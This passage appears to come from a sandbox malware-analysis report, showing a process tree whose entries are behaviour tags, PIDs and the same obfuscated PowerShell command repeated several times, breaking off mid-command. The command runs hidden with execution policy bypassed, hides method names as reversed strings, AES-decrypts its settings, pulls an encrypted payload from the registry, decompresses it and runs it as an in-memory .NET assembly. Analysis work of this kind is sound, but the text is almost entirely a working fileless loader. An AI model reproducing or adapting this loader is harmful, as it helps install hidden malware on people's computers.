[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:5228
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        
        PID:8472
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        
        PID:1660
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        
        PID:8700
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 